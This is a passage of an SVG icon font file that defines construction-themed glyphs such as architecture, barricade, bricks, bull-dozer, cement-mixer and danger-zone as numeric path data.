0-18-13-8-21-11z m118-5c-8 2-15 1-23 1v2c-8 0-16 0-24 0-10-1-16 1-16 13 0 12 4 17 16 17 16 0 32 0 48 2 18 2 13-10 14-19 1-12-2-18-15-16z m127 300c0-1 0-1-1-2-7-1-14-2-22-3v-19l21-4c1 0 2-1 2-2 2-4 3-8 5-12 1-1 1-2 0-3l-11-16c-1-1-1-1 0-2 4-4 8-8 11-11 1-1 2-1 3-1l16 11c1 1 2 1 3 1 3-3 7-4 12-5 1 0 1-1 2-3 1-6 2-13 3-20h19c2 7 3 14 4 20 0 2 1 3 2 3 4 1 8 2 11 5 2 0 3 0 4-1 5-3 10-7 15-10 2-1 2-2 4 0 3 3 7 7 10 10 1 2 1 2 0 4-3 5-7 10-11 15 0 1-1 2 0 3 2 4 4 8 5 12 0 1 1 2 2 2l19 3c2 0 2 1 2 3 0 4 0 9 0 14 0 2-1 3-3 3l-18 3c-1 0-2 1-2 2-1 4-3 8-5 12-1 1-1 2 0 3 4 5 8 10 11 16 1 1 1 1 0 2-4 4-7 8-11 11-1 1-1 1-3 0l-15-11c-1-1-2-1-3 0-4 2-8 4-12 5-1 0-2 1-2 2l-3 19c0 1-1 2-3 2-5 0-10 0-15 0-1 0-2-1-2-2l-3-18c0-2-1-3-2-3-4-1-8-3-12-5-1-1-2 0-3 0-5 4-11 8-16 12-1 0-1 0-2-1-4-3-8-7-11-11-1-1-1-1-1-3 4-5 8-10 11-15 1-1 1-2 1-3-3-3-4-8-6-12z m54 12c15 0 27-12 27-27 0-15-12-27-27-27-15 1-27 13-27 27 0 15 13 27 27 27z m56 65l-12-7c-1-1-2-1-1-3 2-3 3-6 4-10 1-1 2-1 3-1l13 3c1 0 2 0 3-1 2-3 4-5 7-7 1 0 1-1 1-2-1-5-2-9-4-14 0-1 0-2 2-3 3-1 7-2 10-4 1 0 2 0 2 1l8 12c1 1 1 2 3 1 3 0 6 0 9 0 1 0 2 0 2-1l8-12c1-1 1-1 3-1 3 2 6 3 10 4 1 1 1 1 1 3l-3 13c-1 2 0 3 1 3 2 2 4 4 6 7 1 1 2 1 3 1 4-1 9-2 14-4 1 0 2 1 2 2 1 3 3 7 4 10 1 1 1 2-1 3-4 2-7 5-11 7-1 1-2 1-2 2 1 3 1 7 0 10 0 1 1 2 2 2 4 3 8 5 12 8 1 1 1 1 1 2-2 4-3 7-5 11 0 1-1 1-2 1l-14-3c-1-1-2-1-2 1-2 2-5 4-7 6-1 1-1 2-1 3l3 13c1 2 0 2-1 3-4 1-7 3-10 4-1 1-2 1-3 0l-7-12c-1-2-2-2-3-2-3 1-6 1-9 0-1 0-2 0-2 2-3 3-5 7-8 11-1 2-1 2-3 1-3-1-6-3-9-4-2 0-2-1-2-3 1-5 2-9 3-14 1-1 0-1-1-2-2-2-4-4-6-6-1-1-2-1-4-1-4 1-8 2-13 3-1 1-2 0-2-1-2-3-3-7-4-10-1-2-1-2 1-3 4-2 7-5 11-7 1-1 2-2 1-3 0-3 0-6 0-9 0-1 0-2-1-3z m44 28c11-1 20-10 20-21-1-11-9-20-21-20-11 0-20 9-20 20 0 12 9 21 21 21z" />
<glyph glyph-name="architecture" horiz-adv-x="1000" unicode="&#xe986;" d="M857-4c-8 25-16 50-25 75-18 54-36 109-55 163-8 22-24 34-47 35-20 2-42-9-48-28-5-14-12-16-24-16-109 0-217 0-326-1-7 0-9 3-11 9-7 23-26 37-49 37-23-1-41-14-49-37-7-20-14-41-21-62-20-58-40-117-59-176-14-42 17-83 62-82-7 3-12 5-16 8-24 12-33 41-20 64 11 19 34 26 54 15 16-9 22-28 13-44-3-6-7-13-15-10-9 4-6 11-2 17 5 7 3 14-3 19-7 6-16 7-24 1-14-10-14-31 0-43 21-18 52-7 61 23 20 72 41 144 59 216 4 13 9 14 20 14 111 0 222 0 334 0 14 1 19-5 23-18 18-67 37-134 56-202 2-10 5-20 12-28 15-18 44-17 57 1 8 12 5 24-3 34-6 7-14 9-23 4-12-6-11-15-4-26 2-3 2-8-3-11-5-4-9-1-12 3-11 10-12 28-2 40 10 12 22 18 38 14 18-5 27-16 31-33 5-26-5-40-41-59 49 3 76 41 62 84z m-561 219c-17-65-35-130-52-194-3-10-6-14-15-6-9 8-20 13-32 13-13-1-15 3-11 15 21 60 41 120 61 181 4 12 11 20 21 20 21 1 32-12 28-29z m491-191c-9-4-17-9-27-15-19 70-37 138-56 207-3 13 2 22 15 26 13 4 27 3 31-11 24-67 46-134 69-203-13 1-23 0-32-4z m-427 574c93 0 187 0 280 0 4 0 10-1 11 3 1 13 1 26 1 39 0 10-10 6-15 8-6 2-5 8-6 13-4 30-18 55-43 80 0-22 0-39 0-56 0-6 1-13-9-12-8 0-7 7-7 12 0 17-1 34 1 51 1 14-5 21-17 26-14 7-16 3-16-11 1-29 0-59 0-89 0-5 4-13-5-13-8 1-5 9-5 14 0 34 0 69 0 104 1 14-6 21-20 21-5 0-10 0-15 0-21-1-25-4-25-25 0-33 0-67 0-100 0-5 3-14-5-14-9 0-5 9-5 14-1 34 0 68 0 102-31-7-33-8-32-37 0-12 0-25 0-38-1-6 4-17-8-17-12 0-8 10-8 16 0 16 0 31 0 51-25-23-37-47-43-75-1-9 0-19-15-18-5 0-5-5-5-8 0-11 0-21 0-31 0-9 4-10 11-10z m271-21c-44-1-87-1-131-1h-122c-25 0-25 0-19-24 16-66 78-113 148-111 66 3 125 56 137 122 2 13-3 14-13 14z m-227-256c43 1 86 0 129 0 22 0 43 1 65 0 10 0 15 3 15 13-1 29 0 58-1 86 0 20-19 12-28 18-10 6-11-3-15-8-15-23-29-46-44-68-12-18-41-16-52 2-14 22-28 44-42 66-4 7-7 15-16 9-10-6-27-1-27-21 1-27 1-54 0-82 0-12 4-15 16-15z m336-384c-5 7-11 7-18 7l-445 0c-5 0-11 1-15-5-8-11-19-19-31-27h539c-11 8-23 14-30 25z m-364 321c0-11 3-14 15-14 36 0 72 0 109 0 35 0 70 1 106 0 16-1 19 5 18 20-1 12 2 22-18 22-65-2-131-1-197-2-31 0-31-1-33-26z m14-124c1 4 6 10-1 13-5 2-12 3-17-2-3-2-4-8-6-12-13-49-27-97-40-146-1-5-10-15 3-16 9-1 23-8 26 9 3 16 8 31 10 47 3 12 7 18 22 17 20-1 41 0 62 0 22 0 44 0 65 0 8 0 19-4 18 12 0 13-4 18-18 17-41-1-82 0-122 0-12-1-15 3-12 14 4 16 7 31 10 47z m-90 148c15-5 26-16 34-29 3-5 5-10 12-8 7 1 5 9 5 13 1 26 1 51 1 77h1c0 23 0 47 0 70 0 4 1 9-4 11-9 3-38-14-40-22-6-32-11-65-17-97-2-7 0-12 8-15z m348 124c1-25 0-50 0-75h0c0-24 0-48 1-72 0-5-3-12 4-14 8-3 11 2 14 8 7 13 17 23 32 28 9 4 11 9 9 18-5 26-11 51-13 77-1 25-15 33-35 39-9 2-12 1-12-9z m-23-243c-2 10-7 12-16 12-26 0-51 0-77 0v0c-26 0-52 0-78 0-12 1-17-2-17-14 1-15 11-9 18-9 44-1 89-2 134 0 16 0 22-6 24-20 2-11 5-22 7-33 3-12 11-8 18-8 9 1 5 8 4 13-6 20-12 39-17 59z m8-170c-14 1-28 1-42 0-6 0-15 4-14-8 0-9 2-16 15-15 12 1 24 0 36 0v0c13 0 27 0 40 0 5 0 11-1 9 7-7 24-13 48-20 72-3 9-13 5-20 5-10-1-4-8-3-13 3-12 5-23 8-35 2-9 1-13-9-13z" />
<glyph glyph-name="barricade" horiz-adv-x="1000" unicode="&#xe987;" d="M898 675h-796c-22 0-39-17-39-39v-261c0-22 17-39 39-39h796c22 0 39 17 39 39v261c1 22-17 39-39 39z m-753-282c-3-2-5-5-8-7-7-6-16-6-24-4-7 2-6 14-5 20-2 37 1 68 1 103 0 10 5 19 12 26 31 29 61 60 91 90 4 4 8 8 15 8 49 0 99 0 148 0l2-5c-49-48-98-97-147-146-29-28-54-59-85-85z m329 6c-12-12-24-18-42-18-43 1-87 1-131 1l-3 4c36 35 71 70 106 105 44 43 87 86 130 129 5 5 9 10 16 10 50-1 100-1 149-1l3-4c-29-29-59-57-88-86-47-46-94-93-140-140z m408 85c-32-31-63-63-94-94-5-5-10-8-17-8-49 0-98 0-147 0-1 1-1 3-2 4 61 60 121 121 182 181 18 18 37 36 54 55 8 8 22 9 26 6 5-2 4-12 4-19 1-35 0-70 0-106 0-7-1-13-6-19z m-614-412v248h-63v-249h-116v-46h292v46h-112c-1 0-1 1-1 1z m525 0v248h-35l-2 0c-3 0-5 0-8 0h-18v-249h-114v-46h291v46h-113l-1 1z" />
<glyph glyph-name="bolt" horiz-adv-x="1000" unicode="&#xe988;" d="M795 788h-589c-14 0-26-13-26-27v-115c0-15 12-27 26-27h588c15 0 27 13 27 27v115c0 14-12 27-26 27z m-401-363c72 15 142 30 212 45v111h-212v-156z m190-2c-32-7-65-13-97-21-25-5-51-11-77-17-10-2-16-9-15-20 1-11 8-15 17-16 3 0 4 0 5 0 58 13 117 26 175 39 13 3 18 12 16 23-3 10-12 15-24 12z m-164-146c36 8 73 16 109 24 22 5 44 10 66 15 10 3 16 11 12 21-2 7-9 12-14 17l-3-2-4-1c-58-12-116-25-175-38-12-3-18-12-15-24 2-10 12-14 24-12z m0-73c19 5 37 9 56 13 38 8 76 16 113 25 10 2 19 6 19 20 1 11-10 19-22 17-58-13-117-26-175-39-13-3-18-12-15-23 2-11 12-15 24-13z m163 1c-28-6-56-12-84-18-29-7-58-13-87-20-12-2-18-10-17-21 2-11 9-15 18-15 2 0 3 0 3 0 59 13 118 25 176 39 13 3 19 12 15 23-2 10-11 15-24 12z m-164-146c37 8 74 16 111 24 21 4 43 9 64 14 10 3 15 10 14 21-1 10-8 14-17 15-2 0-3 0-5 0-58-13-117-26-175-39-13-3-18-12-15-23 2-10 11-15 23-12z m167 1c-58-13-116-25-174-38-13-3-19-12-16-24 2-10 12-15 25-12 14 3 28 6 42 10 42 9 84 18 126 27 10 2 19 6 19 21 1 10-9 19-22 16z m0-73c-58-12-116-25-174-38-13-3-19-12-16-23 2-11 11-16 24-13 23 5 46 10 68 15 34 8 68 15 102 22 10 3 18 7 18 20 0 12-10 20-22 17z" />
<glyph glyph-name="bricks" horiz-adv-x="1000" unicode="&#xe989;" d="M937 396v40c0 61 0 61-57 83-149 57-298 114-448 171-10 5-21 7-33 4-106-29-214-57-321-85-11-4-15-8-15-21 0-47 0-94 0-142 0 0 0-1 0-1 0-5 0-10 0-15v-12c0-1 0-2 0-3v-2c1-9 5-14 15-17l18-7c159-60 317-120 475-181l3-1c8-3 16-4 25-1l5 1c100 26 200 53 300 80l16 4c11 3 16 7 17 16 0 2 0 5 0 7-1 28 0 54 0 82z m-172 110c-47-22-95-29-141 6 48 21 96 30 141-6z m-318 33c18-2 34-8 51-20 1 0 2 0 2-1-47-25-95-26-142 5 30 12 60 20 89 16z m177-70c-47-27-94-21-140 5 28 13 57 21 85 18 16-2 33-8 49-18 2-2 4-3 6-5z m15 85c-47-22-95-28-141 5 48 23 96 29 141-5z m-125 49c-62-26-91-25-143 4 55 26 79 26 143-4z m-138-37c-69-25-87-24-142 4 53 26 78 25 142-4z m177-314c-106 40-212 80-318 121-40 15-81 31-121 46-13 4-19 9-18 24l0 25c1 31 0 63 0 99 38-15 73-28 108-42l45-17 123-47c20-7 39-15 59-22l67-25c20-8 39-15 58-22l3-1c9-4 13-10 12-21 0-8 0-16 0-24 0-13-1-26-1-40 0-14 1-27 1-42 1-16-2-19-18-12z m339 67l-273-73c-11-3-15-1-15 11 1 19 0 38 0 57v22c0 11 0 23 0 34 0 10 1 15 12 18 45 11 89 23 134 35 48 13 96 26 143 39 10 3 11-1 11-8-1-30-1-60 0-90 0-11 0-21 0-32 0-9-5-12-12-13z m46-177c0-17-4-25-18-29-107-35-214-71-321-107-9-3-17-2-25 2-166 79-331 158-496 237-11 5-15 12-15 27 0 60 0 118 0 178 1-12 5-18 15-22 6-3 12-6 18-9 1-40 1-78 0-115-1-19 5-25 18-31 40-18 81-38 121-57 106-51 212-101 318-153 16-7 19-3 18 17 0 30-1 61 0 91h33v-29c0-24 1-48 0-71 0-15 4-18 15-15 91 31 182 62 273 92 7 2 12 5 12 17 0 42 0 84 0 126l16 5c12 4 16 10 17 20 0-5 0-13 0-20v-51c0-35-1-69 1-103z m-334 82v-53h-33c0 19 0 38 0 57l3-3c8-11 16-14 25-5 2 0 4 3 5 4z" />
<glyph glyph-name="building-alt" horiz-adv-x="1000" unicode="&#xe98a;" d="M757 725c-11 60-14 63-76 63h-122c-50-1-58-8-64-62-103-25-133-59-135-164-2 0-3 1-4 1-34 0-68 0-102 0-34 0-39-27-42-53-74-24-97-55-97-134 0-135 0-269 0-403 0-48 12-60 59-61 71 0 142 0 217 0 0 1 0 2 0 3 7-2 16-2 26-3 144 0 288 0 432 0 11 0 21 1 35 2v637c0 110-27 147-127 174z m-449-658c-45 0-59-11-61-52 0-10 0-21 0-33h-64c-1 4-3 8-3 13 0 132-1 264 0 396 0 35 14 49 49 49 42 0 85 0 130 0v-97c-23-3-27-22-26-42 0-24 2-43 26-46v-31c-22-3-28-20-26-43-1-24 3-41 26-44v-90c-7 15-22 20-51 20z m511-85h-114c0 23 1 45 0 67-1 41-13 54-51 54-23 0-46 1-69 0-32-1-45-14-47-48 0-24 0-48 0-73h-112c-1 12-2 23-2 34 0 185 0 369 0 554 0 60 24 86 82 87 78 0 156 0 234-1 55 0 80-27 80-84 0-187 0-374 0-561 0-9-1-18-1-29z m-572 272c32-1 34 20 32 44 2 25-1 45-31 45-32 0-34-21-34-46-1-24 3-43 33-43z m1-29c-31 0-35-20-35-46 0-25 4-42 34-43 32-1 34 20 32 45 3 25-2 44-31 44z m282 341c-42 0-47-6-47-57 0-49 5-55 49-55 40 1 44 6 44 56 0 51-4 57-46 56z m-2-293c-40 0-45-6-45-58 0-47 6-54 46-54 43 0 47 5 47 57 0 52-3 55-48 55z m48 88c0 56-1 57-44 58-47 0-49-3-49-54 0-54 2-56 47-56 44 0 46 2 46 52z m138 205c-41 0-46-6-46-57 0-49 5-55 48-55 41 1 45 6 45 56 0 51-5 57-47 56z m-1-293c-40 0-45-6-45-58 0-47 5-54 46-54 43 0 47 5 47 57 0 52-3 55-48 55z m48 88c0 56-2 57-45 58-46 0-48-3-48-54 0-54 1-56 46-56 45 0 47 2 47 52z" />
<glyph glyph-name="bull-dozer" horiz-adv-x="1000" unicode="&#xe98b;" d="M506 278h262c26 0 48 21 48 47v281c0 27-22 48-48 48h-215c-26 0-52-21-57-47l-28-104c-6-26-10-68-10-94v-84c0-26 22-47 48-47z m-12 210l25 102c4 20 23 35 43 35h188c20 0 36-16 36-35v-101c0-20-16-36-36-36h-205l18 42c3 7-1 15-8 18-7 3-16 0-19-7l-21-52c-15 4-24 18-21 34z m-63-137c-5 8-18 13-27 7-33-25-66-50-99-74v42c0 19-11 23-24 10l-211-265c-13-13-8-24 10-24h191c19 0 34 15 34 34v153c40 30 79 60 119 89 9 7 13 17 7 28z m63-205c0-25-20-45-44-45s-45 20-45 45 20 45 45 45 44-20 44-45z m187 0c0-25-20-45-44-45s-45 20-45 45 20 45 45 45 44-20 44-45z m187 0c0-25-20-45-44-45s-45 20-45 45 20 45 45 45 44-20 44-45z m36 97c-22 16-47 16-73 16h-410c-46 0-85-35-85-82v-48c0-28 14-52 36-68 21-16 47-15 71-15h409c46 0 83 35 85 81 0 0 0 1 0 1 0 42 5 87-33 115z m7-115c-1-30-25-54-56-55-4 0-8 0-12 0h-415c-7 0-14 0-20 1-27 5-45 29-45 56v47c0 31 25 55 55 56 16 0 31 0 47 0h349c17 0 35 2 52-1 27-5 45-30 45-57v-47z" />
<glyph glyph-name="calculations" horiz-adv-x="1000" unicode="&#xe98c;" d="M857 97c-2 12-4 23-14 33-208 207-415 415-622 622-9 9-13 10-23 0-44-45-90-90-135-135v-3c6-2 9-8 14-12 205-206 411-412 616-617 7-7 15-13 25-15 51-10 102-21 154-32 11-2 15-1 12 13-9 48-18 97-27 146z m-110-71c-5-6-11-8-18-4-4 2-6 5-9 8-191 191-382 381-572 572-3 3-6 6-8 9-6 10 1 22 13 23 8-1 12-7 17-12l386-386c60-60 121-121 181-182 4-3 8-7 11-11 4-6 4-12-1-17z m51 51c-5-3-11-3-16 0-4 3-7 7-10 10l-567 567c-2 2-5 5-7 7-7 7-8 14-1 21 7 8 15 7 22 0 3-3 5-5 7-7 189-189 378-378 566-566 6-6 13-11 14-20-1-5-3-10-8-12z m135 541c-46 46-93 93-139 139-7 8-11 6-18-1-76-76-153-153-230-230-6-6-8-9-1-16 15-14 30-29 44-44 6-6 9-6 15 0 5 6 9 10 1 16-4 4-7 8-11 11-7 6-9 10-2 18 8 8 12 6 18-1 4-4 8-8 12-12 5-6 9-4 14 1 5 4 9 9 1 15-4 3-8 8-12 12-5 5-9 9-2 16 8 7 12 7 18 0l11-11c6-8 10-6 16 0 6 6 7 10 0 15-4 3-7 7-11 11-6 5-10 9-2 17 9 9 13 6 19-1 3-4 8-7 11-11 5-7 9-5 15 0 5 6 8 10 0 16l-10 10c-9 7-9 12 0 21 29 28 58 56 86 85 7 8 11 8 19 0 23-24 47-49 72-72 10-9 9-14 0-23-64-64-128-127-191-191-5-5-15-9-11-16 7-10 18-19 27-28 3 2 6 4 8 7 78 77 155 155 233 232 6 6 6 9 0 15z m-513-466c-48-49-97-97-145-145-4-3-7-7-11-10-2 1-4 2-5 4-28 27-55 55-83 82-2 3-4 5-2 9 8 17 22 20 35 7 2-2 4-3 5-5 5-7 10-8 17-1 7 7 5 11-1 16-3 3-6 7-10 10-8 6-8 11-1 19 9 9 13 3 18-2 4-5 8-8 12-13 6-6 10-2 14 2 4 5 8 9 1 14-3 4-7 8-10 11-6 6-13 9-4 19 10 10 15 3 21-3 2-3 6-5 8-8 6-8 10-7 16-1 7 7 6 11 0 16-4 4-7 8-11 11-8 6-8 10-1 17 7 7 11 6 16-1 3-3 8-7 11-11 5-5 9-8 16-1 7 7 7 12 0 17-4 3-7 7-10 10-6 5-10 9-2 17 8 9 13 7 19-1 3-4 7-7 10-11 6-7 10-4 16 1 6 6 6 10 0 15-15 14-29 28-42 43-8 9-12 6-19-1-59-60-119-120-179-179-8-8-8-12 0-20 45-44 89-89 133-134 9-9 14-10 24 0 55 57 112 113 168 169 19 19 18 18 0 38-9 9-15 11-24 0z m401 457c0 21-16 38-36 38-20 0-36-16-37-36-1-21 16-39 37-38 19 0 35 16 36 36z" />
<glyph glyph-name="cement-mix" horiz-adv-x="1000" unicode="&#xe98d;" d="M63 646c3 0 5 3 8 4 39 25 79 50 118 76 5 3 8 3 11-3 1-3 3-5 5-8 5-6 10-13-2-18-4-1-1-4 0-7 7-11 14-22 22-33 3-4 3-8 2-13-4-17-7-35-12-52-1-4 0-7 2-11 25-42 51-83 76-125 3-6 5-6 10-3 18 13 37 25 56 37 3 2 6 4 9 0 23-37 45-75 58-117 6-17 4-34-1-52-6-20-13-39-22-58-2-5-5-6-9-6-26-1-52 1-77 6-16 3-28 12-39 22-31 29-54 63-77 97-3 5 0 7 3 9 19 12 38 24 57 36 6 3 5 6 2 11-25 41-49 82-74 123-3 5-6 7-12 9-16 3-33 7-49 10-5 1-9 3-11 8-7 11-14 21-21 32-3 5-5 7-10 3-5-5-8-3-11 2-4 6-7 13-12 18v3z m141-2c1 3 0 4-1 6-7 10-13 20-19 29-2 4-4 4-8 2-20-13-40-26-61-39-3-3-4-5-1-8 6-9 12-19 18-28 1-3 4-5 7-5l48-11c3 0 5-1 6 3 4 17 7 34 11 51z m734-654c-8 0-14-3-21-6-11-4-21 1-30 7-2 1-3 3-2 5 2 8 4 16 6 24 1 2 2 3 4 3 9 3 19 10 27 8 7-2 6-15 10-23 2-5 2-10 6-15v-3z m-121-18h-102l-529 0c-10 0-10 0-9 10 2 11 4 22 5 34 1 5 4 7 7 9 19 10 38 21 58 31 5 3 7 5 6 12-4 22-6 44-9 66-1 7 0 10 8 10 25 2 51 5 77 7 6 0 8 2 9 8 0 10 2 20 3 30 0 4 1 6 6 6 32 3 63 6 95 8 7 1 8 3 9 9 1 22 3 44 5 66 1 8 8 13 12 19 4 8 10 10 19 7 6-2 14-4 21-5 9 0 11-5 12-12 0-8 2-16 2-23 0-6 3-8 9-8l53 4c7 1 9-1 10-8 0-21 2-42 3-62 0-6 2-9 7-11 22-8 43-17 65-25 5-2 7-4 7-10 1-16 2-32 3-48 1-7 5-9 10-8 8 0 17 2 25 3 10 1 11-1 12-10 0-11 5-18 14-24 8-5 17-8 26-10 3-1 7-1 7-5 4-28 23-45 40-65 1-1 2-2 4-5z m27 200c21 0 35-10 46-26 10-16 17-34 23-51 2-6 1-12-3-18-6-11-16-19-29-23-14-5-28-10-42-15-2 0-4-2-7 1-11 13-24 24-37 35-8 7-11 14-9 24 4 24 15 45 31 63 7 9 18 8 27 10z m-31 104c-1-9-2-16-4-22-2-7-6-12-14-15-5-2-9-4-14-6-20-9-29-3-38 15-8 17-8 36-2 54 4 13 10 15 23 11 10-3 21-8 33-7 5 1 8-3 10-7 4-8 5-16 6-23z m-148 87c6 0 12-2 17-6 7-5 11-11 9-20-3-10-10-18-19-19-7-1-14-2-22-3-5-1-9 0-8 7 0 6 0 12-1 17-1 16 7 24 24 24z m225-159c-9 1-17 4-24 8-3 2-2 5-2 7 2 7 4 14 6 21 1 2 1 4 3 4l27 9c3 1 4-1 5-3 3-11 7-22 11-33 0-2 1-4-2-5-8-3-17-6-24-8z m-140-54c-4 1-6 2-9 3-17 4-18 6-13 22 1 6 1 13 6 16 8 4 18 6 27 9 3 1 3-2 4-4l11-31c0-3 2-5-1-6-9-3-18-6-25-9z m-98 115c1 8 6 13 12 18 1 1 2 1 4 0 9-3 19-6 29-10 5-2 7-9 7-15 0-6-4-9-9-11l-8-3c-18-6-22-5-33 12-2 3-2 6-2 9z" />
<glyph glyph-name="cement-mixer" horiz-adv-x="1000" unicode="&#xe98e;" d="M937 320c0 78-51 136-128 148-14 3-19-1-19-16 1-36 0-72 1-108 0-10-2-15-14-15-16-1-24 4-21 21 1 8 0 16 0 24 0 57 0 57-57 55-16 0-15-9-16-19-2-12 4-14 14-13 11 1 16-2 16-14-1-49-1-98 0-147 0-12-4-15-16-15-160 0-319 0-479 0-13 0-16 4-16 16 0 48 0 95 0 143-1 14 4 18 17 17 8-1 17-1 14 11-3 8 2 20-15 21-58 3-58 4-58-53v-6c0-44 0-43-43-41-10 0-14 4-14 14 1 23 1 45 0 68 0 13-7 22-21 22-13-1-19-10-19-22 0-67-1-134 0-200 0-14 6-23 20-23 14 0 20 10 21 23 0 16 0 31 0 47 0 33 0 32 33 34 19 1 24-5 24-24-1-88-1-175-1-263 0-16 0-26 22-26 21 0 20 10 20 25 0 52 0 105 0 157 0 14 4 18 18 18 80 0 159 0 239 0v0c71 0 141 0 212 0 39 0 40 1 41-37 1-10 4-12 12-10 5 1 10 1 14 0 15-4 19 3 18 17-1 42 0 84 0 126 0 13 3 16 16 17 15 1 21-5 19-20-1-7 0-15-1-22 0-11 4-14 15-14 39 0 78 0 118 0 12-1 15 4 14 15 0 23 0 46 0 69z m-74 33c-12 0-20 8-20 21 0 14 9 20 21 22 14-2 22-9 22-23-1-13-10-21-23-20z m-617 96c3-11 9-19 18-25 57-44 123-62 215-62 28 0 74 10 118 29 47 19 81 49 84 103 0 2 1 3 1 4 15 68-2 126-56 170-88 73-254 71-341-3-40-34-59-77-56-130 2-29 9-57 17-86z m83 232c84 47 172 47 257 0 56-31 55-84 0-118-40-24-84-31-129-32-35 1-70 6-103 20-9 4-18 8-25 13-54 34-55 86 0 117z m-69-297c17-74 109-130 206-126 95 5 179 60 188 125-131-72-262-72-394 1z m472-267c-37-1-66-32-65-70 0-37 31-68 68-67 36 0 68 32 67 68 0 40-31 69-70 69z m1-104c-19 0-34 16-34 36 0 19 16 35 35 36 19 0 36-17 36-37-1-20-18-36-37-35z m-161 583c30 28 27 54-10 74-32 17-67 22-94 21-52 1-94-8-119-23-31-19-34-44-8-70 56-55 173-56 231-2z" />
<glyph glyph-name="concrete-mixer" horiz-adv-x="1000" unicode="&#xe98f;" d="M326 226c-51 0-92-41-92-92s41-92 92-92 92 41 92 92c0 51-41 92-92 92z m0-132c-22 0-40 18-40 40s18 40 40 40 40-18 40-40-18-40-40-40z m385 132c-51 0-92-41-92-92s41-92 92-92 92 41 92 92-41 92-92 92z m0-132c-22 0-40 18-40 40s18 40 40 40 40-18 40-40-18-40-40-40z m-458 172c154-68 242-10 286 90 44 100 27 204-127 272-104 46-238 39-296-14-25-22-52-88-53-121-4-78 86-181 190-227z m7-51h-133c-13 0-23-9-23-21v-39c0-12 10-21 23-21h94c0 33 15 62 39 81z m629 178c-24 18-68 110-68 110-11 22-41 40-65 40h-111s-10 0-23 0h-18c-11 0-20-8-23-18v-293s2-17-24-17h-165c24-19 39-48 39-81h175c0 58 47 105 105 105s105-47 105-105h77c25 0 45 20 45 45v84c0 72-26 112-49 130z m-244 4v115h95c22 0 48-16 58-35l33-68c3-5 6-9 9-12l-195 0z" />
<glyph glyph-name="danger-zone" horiz-adv-x="1000" unicode="&#xe990;" d="M276 444c2-2 4-6 8-5 2 1 1 5 2 8 1 10 2 20 3 30 1 23 5 46-4 69-1 2-1 4-2 6 0 3 0 6 2 7 3 2 6-1 7-3 3-4 5-7 7-10 6-15 6-30 5-46 0-20-2-41-4-62-2-36-2-72-15-106-8-21 7-67 34-81 14-7 28-12 43-19 20-8 36-21 41-44 2-7 6-11 12-14 50-17 99-20 149-2 10 4 17 9 20 20 3 14 12 24 24 31 8 4 15 8 23 11 17 7 34 13 49 21 10 6 19 13 22 24 5 16 9 33 6 50-2 13-4 26-5 39-3 24-4 48-6 73-2 26-4 51-3 77 0 10 2 20 8 28 2 3 4 8 9 6 3-2 2-7 1-10-1-6-3-12-4-19-4-31 2-62 5-94 20 16 30 35 35 58 6 27 7 54 4 82-6 47-26 87-61 119-37 34-82 51-131 59-15 3-29 4-43 6h-38c-3-2-6-2-8-2-39-2-76-10-111-26-31-14-59-34-79-62-41-59-46-123-25-190 4-11 11-21 20-29z m269-14c4 0 7 0 11 0 25-2 50-4 75-9 23-5 39-22 38-43-2-25-15-44-38-54-23-10-44-4-61 12-18 17-35 35-47 56-13 24 3 36 22 38z m-42-102c19-24 37-45 43-74 2-10 0-19-9-26-9-8-17-7-22 5-4 11-7 22-8 34-2 18-3 36-4 54 0 2 0 3 0 7z m-16-3c0-31 0-61-10-90-2-6-5-12-14-12-8 0-17 9-18 17-2 8-1 16 2 24 9 23 24 42 40 61z m-159 67c6 17 20 25 36 29 25 6 51 7 76 10 6 0 12-1 19-3 14-3 22-16 16-29-16-30-36-57-66-73-28-15-58-3-74 25-7 13-12 26-7 41z m574-319c-17 7-35 8-52 6-29-3-55 1-80 14-30 16-61 30-91 46-6 2-8 2-9-5-2-13-5-25-11-37-2-6 0-8 5-11 25-11 49-25 74-36 29-12 50-32 65-58 11-19 26-35 46-43 5-2 13-3 22 1 11 5 14 13 12 25l-3 14c-2 15 2 24 16 31 5 2 10 5 15 7 8 5 11 11 11 20-2 13-8 21-20 26z m-575 59c-1 9-4 8-10 5-30-15-61-30-91-45-23-12-47-16-73-13-13 1-25 1-38-1-10-1-19-4-26-10-17-12-15-34 4-43 4-2 8-4 13-6 11-6 15-15 13-28l-3-15c-2-13 1-20 11-25 4-3 14-6 26-1 18 9 31 23 42 40l8 13c12 19 29 33 50 43 27 13 53 27 80 40 5 2 7 4 4 10-4 11-8 23-10 36z m-185 184c28 2 53-4 78-17 15-9 30-16 47-24-2 7-4 12-6 17-4 13-6 25-4 38 1 7-1 10-7 13-17 8-33 15-46 29-10 11-18 25-27 37-11 16-23 30-42 37-9 3-19 2-27-5-8-7-8-15-6-24 1-4 1-8 2-13 3-13-1-22-13-28-4-2-8-4-12-6-7-3-13-8-16-15v-10c5-18 18-25 34-28 15-3 30-2 45-1z m488-107c-1 2-2 4-6 4 0-18-1-37-5-54-6-32-20-59-48-77-16-10-33-15-51-17-26-2-51-2-76 5-45 14-65 44-71 89-2 17-4 35-4 52-8-8-12-18-13-29-2-33 3-64 14-95 13-32 37-53 70-62 36-10 72-11 108-2 35 8 62 28 77 62 13 29 16 60 16 91 0 12-5 23-11 33z m-110-122c1-3 2-5 5-5 5 0 11-2 14 5 3 4 1 23-2 24-1 1-2 1-4 1-11 0-14-1-13-16 0-3 0-6 0-9z m-31-7c10-3 14 1 14 14 0 16-1 17-11 16-6 0-10-3-9-8 2-7-6-18 6-22z m8 71c-4 0-11 3-13-3-2-7-1-14 0-21 1-3 3-4 6-5 10-2 13 2 13 15v8c0 4-2 7-6 6z m-39-69c8-1 8 4 8 9 0 1 0 3 0 6v2c0 11-2 13-12 13-10 1-7-7-7-12-1-3 0-6 0-8-1-9 5-10 11-10z m8 56v2c0 11-2 13-11 13-10 0-8-7-8-13 0-2 0-5 0-7 0-5 2-8 7-9 11-1 13 1 12 14z m61-14c6 0 13 0 12 9 0 5 0 10 0 15 0 3-2 4-6 5-10 2-13-2-13-15v-5c0-5 0-9 7-9z m48 30c-2 5-8 3-11 2-9-1-8-8-8-15 1-3-1-9 4-11 5-1 11 1 14 5 4 5 3 12 1 19z m-153-36c-3 1-7 4-11 0-3-3 0-8 1-11 0-3 2-6 4-9 2-4 5-9 10-8 6 1 2 8 3 11 0 3 0 5 0 8 0 5-2 8-7 9z m-4 38c-9 0-7-7-7-12-1-9 4-14 13-14 9 0 4 8 6 11 0 12-2 15-12 15z m141-66c4-2 6 1 8 3 5 6 8 12 9 20 1 5-1 7-6 6-11-1-13-3-12-17 0-2-1-4 0-5 0-3-1-6 1-7z m38 55c8 13 13 32 11 49-12-7-16-30-11-49z m-218 